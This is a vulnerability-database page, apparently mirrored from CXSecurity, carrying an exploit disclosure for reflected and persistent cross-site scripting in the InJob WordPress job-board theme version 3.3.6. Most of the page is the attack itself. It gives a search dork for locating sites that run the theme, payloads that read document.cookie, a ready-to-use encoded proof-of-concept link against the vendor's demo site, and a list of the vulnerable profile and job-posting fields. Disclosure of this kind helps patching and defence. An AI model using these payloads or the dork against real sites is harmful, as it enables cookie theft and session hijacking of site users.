InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1742287 漏洞类型
发布时间 2019-09-16 更新时间 2019-09-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090115
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS
# Google Dork: inurl:/wp-content/themes/injob/
# Date: 15/09/2019
# Exploit Author: SubversA
# Vendor Homepage: http://www.inwavethemes.com/
# Software Link: https://themeforest.net/item/injob-job-board-wordpress-theme/20322987
# Version: 3.3.6
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Reflected XSS: -[]----
Use your payload inside the «Enter Keywords» input field and then submit the form — payload will be triggered twice.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC Link: http://jobboard.inwavethemes.com/jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location=&iwj_cat=&iwj_type=&iwj_skill=&iwj_level=&iwj_salary=


----[]- Persistent XSS #1: -[]----
You need a new basic user account, then go to the dashboard and edit your profile. Vulnerable input fields:
- «Phone» & «Headline *»;
- «Title» input field in the «Skills» section;
- «Title», «Description», «Date In - Date Out» & «Company Name» in the «Experiences» section;
- «Title», «Description» & «School Name» in the «Educations» section;
- «Address *» input field in the «Location & Map» section.
Use your payload inside any vulnerable input field and save your profile.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC: log in as candidate:demo (login/password) and go to the dashboard or as guest go to the http://jobboard.inwavethemes.com/employers?alpha=i page.


----[]- Persistent XSS #2: -[]----
You need an employer user account, then go to the http://jobboard.inwavethemes.com/dashboard/?iwj_tab=new-job page to create a new job offer. Vulnerable input fields: «Salary Postfix Text» and «Address *».

Payload Sample: <img src=x onerror=(alert)(document.domain)//">